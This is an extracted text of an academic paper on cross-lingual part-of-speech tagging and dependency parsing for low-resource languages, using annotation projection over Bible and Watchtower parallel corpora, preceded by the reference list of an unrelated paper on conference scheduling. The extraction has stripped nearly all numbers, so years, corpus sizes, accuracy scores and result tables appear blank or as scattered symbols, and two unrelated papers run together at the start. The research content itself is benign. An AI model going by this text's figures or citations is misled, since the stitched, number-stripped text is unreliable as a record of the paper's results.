potthoff rf, munger mc. . use of integer programming to optimize the scheduling of panels at annual meetings of the public choice society. public choice ( – ): – doi . /a: . quesnelle j, steffy d. . scheduling a conference to minimize attendee preference conflicts. in: proceedings of the th multidisciplinary international conference on scheduling: theory and applications (mista). – . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://treethinkers.org/evolution- -the-good-the-better-and-the-future/ http://treethinkers.org/evolution- -the-good-the-better-and-the-future/ http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /palgrave.jors. https://tartarus.org/martin/porterstemmer/index.html https://tartarus.org/martin/porterstemmer/index.html http://dx.doi.org/ . /eb http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. resnik p. . using information content to evaluate semantic similarity in a taxon- omy. in: proceedings of the th international joint conference on artificial intelligence. – . sampson se. . practical implications of preference-based conference scheduling. production and operations management ( ): – doi . /j. - . .tb .x. spall jc. . stochastic optimization. in: handbook of computational statistics. heidelberg: springer-verlag, – . stidsen t, pisinger d, vigo d. . scheduling euro-k conferences. european journal of operational research ( ): – doi . /j.ejor. . . . tanaka m, mori y. . a hybrid grouping genetic algorithm for timetabling of conference programs. in: proceedings of the th international conference on the practice and theory of automated timetabling (patat ). – . tanaka m, mori y, bargiela a. . granulation of keywords into sessions for timetabling conferences. in: proceedings of soft computing and intelligent systems (scis ). – . vangerven b, ficker am, goossens dr, passchyn w, spieksma fc, woeginger gj. . conference scheduling—a personalized approach. omega : – doi . /j.omega. . . . wallach hm. . topic modeling: beyond bag-of-words. in: proceedings of the rd international conference on machine learning. acm, – doi . / . . yan e, ding y. . scholarly network similarities: how bibliographic coupling networks, citation networks, cocitation networks, topical networks, coauthorship networks, and coword networks relate to each other. journal of the american society for information science and technology : – doi . /asi. . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.omega. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj-cs. multilingual projection for parsing truly low-resource languages željko agić♥ anders johannsen♥ barbara plank♥♣ héctor martı́nez alonso♥♠ natalie schluter♥♦ anders søgaard♥ ♥ center for language technology, university of copenhagen, denmark ♣ center for language and cognition, university of groningen, the netherlands ♠ univ. paris diderot, sorbonne paris cité – alpage, inria, france ♦ mobilepay, copenhagen, denmark {zeljko.agic,soegaard}@hum.ku.dk abstract we propose a novel approach to cross-lingual part-of-speech tagging and dependency pars- ing for truly low-resource languages. our an- notation projection-based approach yields tag- ging and parsing models for over lan- guages. 
all that is needed are freely avail- able parallel texts, and taggers and parsers for resource-rich languages. the empirical evalu- ation across test languages shows that our method consistently provides top-level accu- racies, close to established upper bounds, and outperforms several competitive baselines. introduction state-of-the-art approaches to inducing part-of- speech (pos) taggers and dependency parsers only scale to a small fraction of the world’s ∼ , lan- guages. the major bottleneck is the lack of man- ually annotated resources for the vast majority of these languages, including languages spoken by mil- lions, such as marathi ( m), hausa ( m), and kur- dish ( m). cross-lingual transfer learning—or sim- ply cross-lingual learning—refers to work on using annotated resources in other (source) languages to induce models for such low-resource (target) lan- guages. even simple cross-lingual learning tech- niques outperform unsupervised grammar induction by a large margin. most work in cross-lingual learning, however, makes assumptions about the availability of linguis- tic resources that do not hold for the majority of low-resource languages. the best cross-lingual de- pendency parsing results reported to date were pre- sented by rasooli and collins ( ). they use the intersection of languages covered in the google dependency treebanks project and those contained in the europarl corpus. consequently, they only consider closely related indo-european languages for which high-quality tokenization can be obtained with simple heuristics. in other words, we argue that recent approaches to cross-lingual pos tagging and dependency pars- ing are biased toward indo-european languages, in particular the germanic and romance families. the bias is not hard to explain: treebanks, as well as large volumes of parallel data, are readily available for many germanic and romance languages. several factors make cross-lingual learning between these languages easier: (i) we have large volumes of rela- tively representative, translated texts available for all language pairs; (ii) it is relatively easy to segment and tokenize germanic and romance texts; (iii) these languages all have very similar word order, making the alignments much more reliable. there- fore, it is more straightforward to train and evaluate cross-lingual transfer models for these languages. however, this bias means that we possibly over- estimate the potential of cross-lingual learning for truly low-resource languages, i.e., languages with no supporting tools or resources for segmentation, pos tagging, or dependency parsing. the aim of this work is to experiment with cross- lingual learning via annotation projection, making minimal assumptions about the available linguistic resources. we only want to assume what we can in fact assume for truly low-resource languages. thus, for the target languages, we do not assume the avail- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; revision batch: / ; / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ability of any labeled data, tag dictionaries, typo- logical information, etc. for annotation projection, we need a parallel corpus, and we therefore have to rely on resources such as the bible (parts of which are available in , languages), and publications from the watchtower society (up to languages). 
these texts have the advantage of being translated both conservatively and into hundreds of languages (massively multi-parallel). however, the bible and the watchtower are religious texts and are more bi- ased than the corpora that have been assumed to be available in most previous work. in order to induce high-quality cross-lingual transfer models from noisy and very limited data, we exploit the fact that the available resources are massively multi-parallel. we also present a novel multilingual approach to the projection of depen- dency structures, projecting edge weights (rather than edges) via word alignments from multiple sources (rather than a single source). our approach enables us to project more information than previ- ous approaches: (i) by postponing dependency tree decoding to after the projection, and (ii) by exploit- ing multiple information sources. our contributions are as follows: (i) we present the first results on cross-lingual learning of pos taggers and dependency parsers, assuming only linguistic resources that are available for most of the world’s writ- ten languages, specifically, bible excerpts and translations of the watchtower. (ii) we extend annotation projection of syntactic dependencies across parallel text to the multi- source scenario, introducing a new, heuristics- free projection algorithm that projects weight matrices from multiple sources, rather than dependency trees or individual dependencies from a single source. (iii) we show that our approach performs signifi- cantly better than commonly used heuristics for annotation projection, as well as than delexi- calized transfer baselines. moreover, in com- parison to these systems, our approach per- forms particularly well on truly low-resource non-indo-european languages. all code and data are made freely available for general use. weighted annotation projection motivation our approach is based on the gen- eral idea of annotation projection (yarowsky et al., ) using parallel sentences. the goal is to aug- ment an unannotated target sentence with syntactic annotations projected from one or more source sen- tences through word alignments. the principle is illustrated in figure , where the source languages are german and croatian, and the target is english. the simplest case is projecting pos labels, which are observed in the source sentences but unknown in the target language. in order to induce the gram- matical category of the target word beginning, we project pos from the aligned words anfang and početku, both of which are correctly annotated as noun. projected pos labels from several sources might disagree for various reasons, e.g., erroneous source annotations, incorrect word alignments, or legitimate differences in pos between translation equivalents. we resolve such cases by taking a ma- jority vote, weighted by the alignment confidences. by letting several languages vote on the correct tag of each word, our projections become more robust, less sensitive to the noise in our source-side predic- tions and word alignments. we can also project syntactic dependencies across word alignments. if (us,vs) is a dependency edge in a source sentence, say the ingoing dependency from das to wort, us (wort) is aligned to ut (word), and vs (das) is aligned to vt (the), we can project the depen- dency such that (ut,vt) becomes a dependency edge in the target sentence, making the a dependent of word. 
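as a small illustration of the alignment-weighted voting just described, the sketch below tallies pos votes for one target word from its aligned source words. it is a minimal python sketch rather than the authors' implementation; the input format (a list of (source tag, alignment weight) pairs) is an assumption made for the example.

from collections import defaultdict

def vote_pos(aligned_sources):
    # aligned_sources: (pos_tag, alignment_weight) pairs gathered from all
    # source tokens aligned to a single target token
    scores = defaultdict(float)
    for tag, weight in aligned_sources:
        scores[tag] += weight  # each vote is weighted by alignment confidence
    return max(scores, key=scores.get) if scores else None

# the running example: english "beginning" aligned to german "anfang" and
# croatian "početku", both tagged as nouns by their source-side taggers
print(vote_pos([("NOUN", 0.9), ("NOUN", 0.8)]))  # -> NOUN

projecting a single dependency edge works analogously: the source edge score is carried over to the target edge whose head and dependent are aligned to the source head and dependent.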
obviously, dependency annotation projection is more challenging than projecting pos, as there is a structural constraint: the projected edges must form a dependency tree on the target side. hwa et al. ( ) were the first to consider this problem, applying heuristics to ensure well-formed trees on the target side. the heuristics were not per- fect, as they have been shown to result in excessive non-projectivity and the introduction of spurious re- lations and tokens (tiedemann et al., ; tiede- mann, ). these design choices all lead to di- https://bitbucket.org/lowlands/release https://bitbucket.org/lowlands/release figure : an outline of dependency annotation projection, voting, and decoding in our method, using two sources i (german) and j (croatian) and a target t (english). part represents the multi-parallel corpus preprocessing, while parts and relate to our projection method. the graphs are represented as adjacency matrices with column indices encoding dependency heads. we highlight how the weight of target edge (ut = was,vt = beginning) is computed from the two contributing sources. minished parsing quality. we introduce a heuristics-free projection algo- rithm. the key difference from most previous work is that we project the whole set of potential syn- tactic relations with associated weights—rather than binary dependency edges—from a large number of multiple sources. instead of decoding the best tree on the source side—or for a single source-target sen- tence pair—we project weights prior to decoding, only decoding the aggregated multi-source weight matrix after the individual projections are done. this means that we do not lose potentially relevant infor- mation, but rather project dense information about all candidate edges. . multi-source sentence graph we assume the existence of n source languages and a target language t. for each tuple of translations in our multi-parallel corpus, our algorithm projects syntactic annotations from the n source sentences to the target sentence. projection happens at the sentence-level, taking a tuple of n annotated sentences and an unannotated sentence as input. we formalize the projection step as label propagation in a graph structure where the words of the target and source sentences are vertices, while edges represent dependency edge candidates between words within a sentence (a parse), as well as similarity relations between words of sentences in different languages (word alignments). formally, a projection graph is a graph g = (v,e). all edges are weighted by the function we : e → r. the vertices can be decomposed into sets v = v ∪·· ·∪vn, where vi is the set of words in sentence i. we often need to identify the target sentence vt = v and the source sentences vs = v ∪·· ·∪vn sep- arately. edges between vs and vt are the result of word alignments. the alignment subgraph is the bi- partite graph a = (vs,vt,ea), i.e., the subgraph of g induced by all (alignment) edges, ea, connecting vs and vt. the subgraph induced by the set of vertices vi, written as g[vi], represents the dependency edge candidates between the words of the sentence i. in general these subgraphs are dense, i.e., they encode weight matrices of edge scores and not just the sin- gle best parse. for the source sentences, we assume that the weights are provided by a parser, while the weights for the syntactic relations of the target sen- tence are unknown. 
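one compact way to realize the projection graph defined above is a set of per-sentence token lists and dense weight matrices, plus a sparse map for the alignment subgraph. the sketch below is one possible encoding for illustration, not the authors' data structure; all field names are assumptions.

from dataclasses import dataclass, field
from typing import Dict, List, Tuple

import numpy as np

@dataclass
class Sentence:
    tokens: List[str]
    # dense weight matrix over candidate edges within the sentence:
    # weights[head, dependent] = w_E(head, dependent); filled by a parser for
    # source sentences, initially unknown (e.g., zeros) for the target sentence
    weights: np.ndarray

@dataclass
class ProjectionGraph:
    target: Sentence
    sources: List[Sentence]
    # sparse alignment subgraph A: keys are
    # (source sentence index, source token index, target token index),
    # values are alignment weights w_A in [0, 1]
    alignments: Dict[Tuple[int, int, int], float] = field(default_factory=dict)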
with the above definitions, the dependency projection problem amounts to assigning weights to the edges of g[v_t] by transferring the syntactic parse graphs g[v_1], ..., g[v_n] from the source languages through the alignments a.

part-of-speech projection
our annotation projection for pos tagging is similar to the one proposed by agić et al. ( ). the algorithm is presented in algorithm 1. we first introduce a conditional probability distribution p(l|v) over pos tags l ∈ L for each vertex v in the graph. for all source vertices, the probability distributions are obtained by tagging the corresponding sentences in our multilingual corpus with pos taggers, assigning a probability of one to the best tag for each word, and zero for all other tags. for each target token, i.e., each vertex v, the projection works by gathering evidence for each tag from all source tokens aligned to v, weighted by the alignment score:

    p(l|v_t) ∝ Σ_{v_s ∈ V_S} p(l|v_s) · w_A(v_s, v_t)

the projected tag for a target vertex v_t is then argmax_l p(l|v_t). when both the alignment weights and the source tag probabilities are in {0, 1}, this reduces to a simple voting scheme that assigns the most frequent pos tag among the aligned words to each target word.

algorithm 1: project pos tags
    data: a projection graph g = (v_s ∪ v_t, e); a set of pos labels l; a function p(l|v) assigning probabilities to labels l for word vertices v.
    result: a labeling of v_t
    p̃ ← empty probability table
    label ← empty label-to-vertex mapping
    for v_t ∈ V_T do
        for l ∈ L do
            p̃(l|v_t) ← Σ_{v_s ∈ V_S} p(l|v_s) · w_A(v_s, v_t)
        label(v_t) ← argmax_l p̃(l|v_t)
    return label

algorithm 2: project dependencies
    data: a projection graph g = (v_s ∪ v_t, e).
    result: a dependency tree covering the target vertices v_t.
    if project from trees then
        for i = 1 to n do
            g[v_i] ← dmst(g[v_i])
    for (u_t, v_t) ∈ g[v_t] do
        w_E(u_t, v_t) ← −∞
        if (·, u_t) ∉ e_A or (·, v_t) ∉ e_A then continue
        w_E(u_t, v_t) ← Σ_{i=1}^{n} max_{u_s, v_s ∈ V_i} w_E(u_s, v_s) · w_A(u_s, u_t) · w_A(v_s, v_t)
    g[v_t] ← normalize(g[v_t])
    return dmst(g[v_t])

dependency projection
while in pos projection we project vertex labels, in dependency projection we project edge scores. our procedure for dependency annotation projection is given in algorithm 2. for each source language, we parse the corresponding side of our multi-parallel corpus using a dependency parser trained on the source language treebank. however, instead of decoding to dependency trees, we extract the weights for all potential syntactic relations, importing them into g as edge weights. the parser we use in our experiments assigns scores w_E ∈ R to possible edges. since the ranges and values of these scores are dependent on the training set size and the number of model updates, we standardize the scores to make them comparable across languages. standardization centers the scores around zero with a standard deviation of one by subtracting the mean and dividing by the standard deviation. we apply this normalization per sentence. scores are then projected from source edges to target edges via word alignments w_A ∈ [0, 1]. instead of voting among the incoming projections from multiple sources, we sum the projected edge scores. because alignments vary in quality, we scale the score of the projected source edge by the corresponding alignment probability. a target edge (u_t, v_t) ∈ g[v_t] can originate from multiple source edges even from a single source sentence, due to m : n alignments.
in such cases, we only project the source edge (u_s, v_s) ∈ g[v_i], i > 0, with the maximum score, provided the words are aligned, i.e., (u_s, u_t) and (v_s, v_t) ∈ e_A. in the case of a single source sentence pair, the target edge scores are set as follows:

    w_E(u_t, v_t) ← max_{u_s, v_s ∈ V_i} w_E(u_s, v_s) · w_A(u_s, u_t) · w_A(v_s, v_t)

where w_E(u_s, v_s) is the source edge score and the two w_A terms are the alignment weights. we note the distinction between edge weights w_E and alignment weights w_A. with multiple sources, the target edge scores w_E(u_t, v_t) are computed as a sum over the individual sources:

    w_E(u_t, v_t) ← Σ_{i=1}^{n} max_{u_s, v_s ∈ V_i} w_E(u_s, v_s) · w_A(u_s, u_t) · w_A(v_s, v_t)

after projection we have a dense set of weighted edges in the target sentence representing possible syntactic relations. this structure is equivalent to the n × n edge matrix used in ordinary first-order graph-based dependency parsing. before decoding, the weights are softmax-normalized to form a distribution over each possible head decision. the normalization balances out the contributions of the individual head decisions; and in our development setup, we found that omitting this step resulted in a substantial (∼ %) decrease in parsing performance. we then follow mcdonald et al. ( ) in using directed maximum spanning tree (dmst) decoding to identify the best dependency tree in the matrix. we note that dmst decoding on summed projected weight matrices is similar to the idea of re-parsing with dmst decoding of the output of an ensemble of parsers (sagae and lavie, ), which we use as a baseline in our experiments.

data
training and test sets
we use source treebanks from the universal dependencies (ud) project, version . (nivre et al., ). they are harmonized in terms of pos tag inventory ( tags) and dependency annotation scheme. in our experiments, we use the canonical data splits, and disregard lemmas, morphological features, and alternative pos from all treebanks. out of the languages currently in ud . , we drop languages for which the treebank does not distribute word forms (japanese), and languages for which we have no parallel unlabeled data (latin, ancient greek, old church slavonic, irish, gothic). languages with more than k tokens (in the training data) are considered source languages; the remaining smaller treebanks (estonian, greek, hungarian, latin, romanian, tamil) are strictly considered targets. this results in treebanks for training source taggers and parsers. we use two additional test sets: quechua and serbian. the first one does not entirely adhere to ud, but we provide a pos tagset mapping and a few modifications and include it as a test language to deepen the robustness assessment for our approach across language families. the serbian test set fully conforms to ud, as a fork of the closely related croatian ud dataset. this results in a total of target languages.

multi-parallel corpora
we use two sources of massively parallel text. the first is the edinburgh bible corpus (ebc) collected by christodouloupoulos and steedman ( ), containing languages. ebc has either k or k sentences for each language, depending on whether they are made up of full bibles or just translations of the new testament, respectively. we also crawled and scraped the watchtower online library website to collect what we will refer to as the watchtower corpus (wtc). the data is from - and the final corpus contains languages with sentences in the range of k- k. while some ebc bibles are written in dated language, we do not make any modifications to the corpus if the language is also present in wtc.
however, as basque is not repre- sented in wtc, we replace the basque bible from with a contemporary version from , to en- able the use of basque in the parsing experiments. ebc and wtc both consist of religious texts, but they are very different in terms of style and con- tent. if we examine table that shows the most frequent words per corpus, we observe that the en- glish bible—the king james version from — contains many old english verb forms (“hath”, “giveth”). in contrast, the english watchtower is written in contemporary english, both in terms of verb inflection (“does”, “says”) and vocabulary (“to- day”, “human”). wtc also deals with contempo- rary topics such as blood “transfusion” ( men- tions) and “computer” ( mentions). the other languages also show differences in terms of language modernity and dialectal difference between ebc and wtc. while each bible transla- tion has its individual history, watchtower transla- https://github.com/ffnlp/sethr http://wol.jw.org http://www.biblija.net/biblija.cgi?l=eu http://hdl.handle.net/ / - https://github.com/ffnlp/sethr http://wol.jw.org http://www.biblija.net/biblija.cgi?l=eu ebc: hath, saith, hast, spake, yea, cometh, iniquity, wilt, smote, shew, begat, doth, lo, hearken, thence, verily, neighbour, goeth, shewed, giveth, smite, didst, wherewith, knoweth, night wtc: bible, does, however, says, today, during, show, human, later, important, really, humans, meetings, personal, states, future, fact, relationship, result, at- tention, someone, century, attitude, article, different table : the most frequent words exclusive to the english bible or watchtower. tions are commissioned by the same publisher, fol- lowing established editorial criteria. thus, we not only expect watchtower to yield projected treebanks that are closer to contemporary language, but also more reliable alignments. we expect these proper- ties to make wtc a more suitable parallel corpus for our experiments and for bootstrapping treebanks for new languages. . preprocessing segmentation for the multi-parallel corpora, we apply naive sentence splitting using full-stops, ques- tion marks and exclamation points of the alphabets from our corpora. we have collected these trigger symbols from the corpora, provided that they ap- peared as individual tokens at the ends of lines, and belonged to the “punctuation, other” unicode cate- gory. after sentence splitting, we use naive whites- pace tokenization. we also remove short-vowel di- acritics from all corpora written in arabic script. we use the same sentence splitting and tokeniza- tion for ebc and wtc. this is done regardless of bibles being distributed in a verse-per-line format, which means verses can be split in more than one sentence. the average sentence length across lan- guages is . tokens in ebc and . in wtc. the ud treebank tokenization differs from the to- kenization used for the multi-parallel corpora. the ud dependency annotation is based on syntactic words, and the tokenization guidelines recommend, for example, splitting clitics from verbs, and undo- ing contractions (spanish “del” becomes “de el”). these tokens made up of several syntactic words are https://github.com/bplank/ multilingualtokenizer called multiword tokens in the ud convention, and are included in the treebanks but are not integrated in the dependency trees, i.e., only their forming subto- kens are assigned a syntactic head. 
in order to harmonize the tokenization, we eliminate subtokens from the dependency trees, and incorporate the original multiword tokens—which are more likely to be naive raw tokens—in the trees instead (see http://universaldependencies.org/format.html and https://github.com/coastalcph/ud-conversion-tools). for each multiword token, we provide it with pos and dependency label from the highest subtoken, namely the subtoken that is closest to root. for example, in the case of a verb and its clitics, the chosen subtoken is the verb, and the multiword token is interpreted as a verb. if there are more candidates, we select one through pos ranking.

alignment
we sentence- and word-align all language pairs in both our multi-parallel corpora. we use hunalign (varga et al., ) to perform conservative sentence alignment. the selected sentence pairs then enter word alignment. here, we use two different aligners. the first one is ibm fastalign by dyer et al. ( ), where we adopt the setup of agić et al. ( ), who observe a major advantage in using reverse-mode alignment for pos projection ( - accuracy points absolute). in addition, we use the ibm aligner efmaral by östling ( ). the intuition behind using ibm is that ibm introduces a bias toward more closely related languages, and we confirm this intuition through our experiments. we modify both aligners so that they output the alignment probability for each aligned token pair.

tagging and parsing
the source sides of the two multi-parallel corpora, ebc and wtc, are pos-tagged by taggers trained on the respective source languages, using tnt (brants, ). we parse the corpora using turboparser (martins et al., ). the parser is used in simple arc-factored mode with pruning. we alter it to output per-sentence arc weight matrices. (parameters used: utf, bisent, cautious, realign. parameters used: d, o, v, r. also reverse mode, with default settings, see https://github.com/robertostling/efmaral. parameters used: basic.)

experiments
outline
for each sentence in a target language corpus, we retrieve the aligned sentences in the source corpora. then, for each of these source-target sentence pairs, we project pos tags and dependency edge scores via word alignments, aggregating the contributions of individual sources. once all contributions are collected, we perform a per-token majority vote on pos tags and dmst decoding on the summed edge scores. this results in a pos-tagged and dependency parsed target sentence ready to contribute in training a tagger and parser. we remove target language sentences that contain word tokens without pos labels. this may happen due to unaligned sentences and words. we then proceed to train models.

setup
each of the experiment steps involves a number of choices that we outline in this section. we also describe the baseline systems and upper bounds.
pos tagging
below, we present results with pos taggers based on annotation projection with both ibm and ibm ; cf. table . we train tnt with default settings on the projected annotations.
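the per-sentence projection and decoding step outlined above (summing alignment-scaled source edge scores, softmax-normalizing over head choices, then decoding a tree) can be sketched compactly with numpy. the sketch below is illustrative only, not the released implementation: the input format is an assumption, and the final greedy argmax head selection merely stands in for the chu-liu/edmonds (dmst) decoding actually used.

import numpy as np

def softmax(scores, axis=0):
    scores = scores - scores.max(axis=axis, keepdims=True)
    exp = np.exp(scores)
    return exp / exp.sum(axis=axis, keepdims=True)

def project_edge_scores(target_len, sources):
    # sources: list of (weights, alignment) pairs, one per source sentence;
    # weights[h, d] is the standardized parser score of the source edge h -> d,
    # alignment[s, t] is the word-alignment weight w_A between source token s
    # and target token t (0.0 where unaligned)
    scores = np.zeros((target_len, target_len))
    for weights, alignment in sources:
        # combined[hs, ds, ht, dt] = w_E(hs, ds) * w_A(hs, ht) * w_A(ds, dt)
        combined = (weights[:, :, None, None]
                    * alignment[:, None, :, None]
                    * alignment[None, :, None, :])
        # keep only the best-scoring source edge per target edge, then add that
        # contribution to the running multi-source sum
        scores += combined.max(axis=(0, 1))
    # normalize into a distribution over head choices for every dependent token
    return softmax(scores, axis=0)

# greedy stand-in for tree decoding: highest-scoring head per dependent token;
# the paper instead decodes a well-formed tree with chu-liu/edmonds (dmst).
# heads = project_edge_scores(target_len, sources).argmax(axis=0)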
note that we use the resulting pos taggers in our dependency parsing experiments in order not to have our parsers assume the existence of pos-annotated corpora. for a more extensive assessment, we refer to the work by agić et al. ( ) who report baseline and upper bounds. in contrast to their work, we consider two different alignment models and use the ud pos tagset ( tags), in contrast to the tags of petrov et al. ( ). this makes our pos tagging problem slightly more challenging, but our parsing models potentially benefit from the extended tagset. dependency parsing we use arc-factored tur- boparser for all parsing models, applying the same setup as in preprocessing. there are three sets of models: our systems, baselines, and upper bounds. our fork of turboparser is available from https:// github.com/andersjo/turboparser. for example, the aux vs. verb distinction from ud pos does not exist the tagset of petrov et al. ( ), and neither does noun vs. propn (proper noun). our systems are trained on the projected ebc and wtc texts, while the rest—except system: dca- proj (see below)—are trained on the (delexical- ized) source-language treebanks. to avoid a bias toward languages with big tree- banks and to make our experiments tractable, we randomly subsample all training sets to a maximum of k sentences. in the multi-source systems, this means a uniform sample from all sources up to k sentences. this means our comparison is fair, and that our systems do not have the advantage of more training data over our baselines. our systems we report on four different cross- lingual systems, alternating the use of word aligners (ibm , ibm ) and the structures we project, as they can be either (i) arc-factored weight matrices from the parser (graphs) or (ii) the single-best trees pro- vided by the parser after decoding (trees). see the if-clause in algorithm . we tune two parameters for these four systems us- ing english as development set, confidence estima- tion and normalization, and we report the best setups only. for the ibm -based systems, we use the word alignment probabilities in the arc projection, but we use unit votes in pos voting. the opposite yields the best ibm scores: binarizing the alignment scores in dependency projection, while weight-voting the pos tags. we also evaluated a number of different normalization techniques in projection, only to ar- rive at standardization and softmax as by far the best choices. baselines and upper bounds we compare our systems to three competitive baselines, as well as three informed upper bounds or oracles. first, we list our baselines. delex-ms: this is the multi-source direct delexicalized parser transfer baseline of mcdonald et al. ( ). dca-proj: this is the direct correspondence as- sumption (dca)-based approach to projection, i.e., the de facto standard for projecting dependencies. first introduced by hwa et al. ( ), it was recently elucidated by tiedemann ( ), whose implemen- tation we follow here. in contrast to our approach, referred to as multi-dir in the original paper. https://github.com/andersjo/turboparser https://github.com/andersjo/turboparser dca projects trees on a source-target sentence pair basis, relying on heuristics and spurious nodes or edges to maintain the tree structure. in the setup, we basically plug dca into our projection-voting pipeline instead of our own method. reparse: for this baseline, we parse a target sentence using multiple single-source delexicalized parsers. 
then, we collect the output trees in a graph, unit-voting the individual edge weights, and finally using dmst to compute the best dependency tree (sagae and lavie, ). now, we explain the three upper bounds: delex-sb: this result is using the best single- source delexicalized system for a given target lan- guage following mcdonald et al. ( ). we parse a target with multiple single-source delexicalized parsers, and select the best-performing one. self-train: for this result we parse the target- language ebc and wtc data, train parsers on the output predictions, and evaluate the resulting parsers on the evaluation data. note this result is available only for the source languages. also, note that while we refer to this as self-training, we do not concate- nate the ebc/wtc training data with the source treebank data. this upper bound tells us something about the usefulness of the parallel corpus texts. full: direct in-language supervision, only avail- able for the source languages. we train parsers on the source treebanks, and use them to parse the source test sets. evaluation all our datasets—projected, training, and test sets—contain only the following conll- x features: id, form, cpostag, and head. for simplicity, we do not predict dependency labels (deprel), and we only report unlabeled attach- ment scores (uas). the pos taggers are evaluated for accuracy. we use our ibm taggers for all the baselines and upper bounds. . results our average results are presented in figure , in- cluding broken down by language family, the lan- http://ilk.uvt.nl/conll/#dataformat languages baselines all sources targets ie non-ie delex-ms . ? . ? . ? . ? . † dca-proj . † . ? . ? . † . † reparse . ? . ? . ? . ? . ? our systems ibm graphs . ? . ? . ? . ? . ? trees . ? . ? . ? . ? . ? ibm graphs . † . ? . ? . † . † trees . † . ? . ? . † . ? upper bounds delex-sb . ? . ? . ? . ? . ? self-train — . ? — — — full — . ? — — — table : overview of the parsing experiment results for the languages in ebc ∩ wtc. we report the best av- erage uas score per system and language subset. ie: indo-european languages, †: ebc, ?: wtc. guages for which we had training data (sources) and those for which we only had test data (targets). we see that our systems are substantially bet- ter than both multi-source delexicalized transfer, dca, and reparsing based on delexicalized trans- fer models. focusing on our system results, we see that projection with ibm leads to better models than projection with ibm . we also note that our improvements are biggest with non-indo-european languages. our ibm -based parsers top the ones using ibm alignment by points uas on indo- european languages, while the difference amounts to almost points uas on non-indo-european lan- guages (cf. table ). this difference in scores ex- poses a systematic bias towards more closely related languages in work using even more advanced word alignment (tiedemann and agić, ). the detailed results using the watchtower corpus are listed in table , where we also list the pos tagging accuracies. note that these are not directly comparable to agić et al. ( ), since they use a more coarse-grained tagset, and the results listed here are using wtc. we list the detailed results with the bible corpus online. the tendencies are the same, but the results are slightly lower almost con- sistently across the board. 
finally, we observe that our results are also better than those that can be obtained using a predictive model to select the best source language for delexicalized transfer (rosa and žabokrtský, ), and better than what can be obtained using an oracle (delex-sb) to select the source language. table : pos tagging accuracies and uas parsing scores for the models built using wtc data. the results are split for source and target languages. all baselines and upper bounds use ibm pos taggers, while our multi-proj systems use their respective ibm or ibm taggers. (the detailed per-language results are available from https://bitbucket.org/lowlands/release.) direct supervision (full) upper bound unsurprisingly records the highest scores in the experiment, as it uses biased in-language and in-domain training data. we also experiment with learning curves for direct supervision, with a goal of establishing the amount of manually annotated sentences needed to beat our cross-lingual systems. we find that for most languages this number falls within the range of - in-domain sentences. discussion function words in ud, a subset of function words—tags: adp, aux, conj, sconj, det, punct—have to be leaves in the dependency trees, unless, e.g., they participate in multiword expressions. our predictions show some violations of this constraint (less than % of all words with these pos), but this ratio is similar to the amount of violations found in the test data. projectivity the ud treebanks are in general largely projective. our ud test languages have an average of % fully projective sentences. however, with ibm for example, we only predict % of all sentences to be projective. regardless of the differences in uas, we observe a corpus effect in the difference of projectivity of the predictions between using ebc ( %) and wtc ( %). we attribute the higher level of projectivity of ebc-projected treebanks to bible sentences being shorter. the least projective predictions are farsi ( %) and hindi ( %), for which we also obtain the lowest uass. this may be a consequence of our naive tokenization, yielding unreliable alignments. however, projectivity correlates more with uas (ρ = . ) than with pos prediction accuracy (ρ = . ). dependency length we observe that the average edge length on ibm and wtc is of .
, while for ebc it is . . the average gold edge length is . —which is significantly higher at p < . (stu- dent’s t-test). however, the variance in gold edge length is about . times the deviation of predicted edge length. in other words, gold edges are often longer and more far-reaching. this difference in- dicates our predictions have worse recall for longer dependencies such as subordinate clauses, while be- ing more accurate in local, phrasal contexts. pos errors unlike most previous work on cross- lingual dependency parsing, and following the no- table exception of mcdonald et al. ( ), we rely on pos predictions from cross-lingual transfer mod- els. one may hypothesize that there is a significant error propagation from erroneous pos projection. we observe, however, that about % of wrong pos predictions are nevertheless assigned the right syn- tactic head. we argue that the fairly uniform noise on the pos labels helps the parsers regularize over the pos-dependency relations. possible improvements we treat pos and syn- tactic dependencies as two separate annotation lay- ers and project them independently in our approach. moreover, we project edge scores for dependencies, in contrast to only the single-best source pos tags. johannsen et al. ( ) introduce an approach to joint projection of pos and dependencies, showing that exploiting the interactions between the two lay- ers yields even better cross-lingual parsers. their approach also accounts for transferring tag distribu- tions instead of single-best pos tags. all the parsers in our experiments are restricted to k training sentences. ebc and wtc texts offer up to k training instances per language. we observe limited benefits of going beyond our training set cap, indicating a more elaborate instance selection-based approach would be more beneficial than just adding more training data. in our dependency graph projection, we normal- ize the weights per sentence. for future develop- ment, we note that corpus-level normalization might achieve the same balancing effect while still preserv- ing possibly important language-specific signals re- garding structural disambiguations. ebc and wtc constitute a (hopefully small) sub- set of the publicly available multilingual parallel corpora. the outdated ebc texts can be replaced by newer ones, and the ebc itself replaced or aug- mented by other online sources of bible translations. other sources include the un declaration of human rights, translated to languages, and reposito- ries of movie subtitles, software localization files, and various other parallel resources, such as opus (tiedemann, ). our approach is language- independent and would benefit from extension to datasets beyond ebc and wtc. related work pos tagging while projection annotation of pos labels goes back to yarowsky’s seminal work, das and petrov ( ) recently renewed interest in this problem. das and petrov ( ) go beyond our ap- proach to pos annotation by combining annotation projection and unsupervised learning techniques, but they restrict themselves to indo-european lan- guages and a coarser tagset. li et al. ( ) intro- duce an approach that leverages potentially noisy, but sizeable pos tag dictionaries in the form of wik- tionaries for resource-rich languages. garrette et al. ( ) also consider the problem of learning pos taggers for truly low-resource languages, but sug- gest crowdsourcing such pos tag dictionaries. finally, agić et al. 
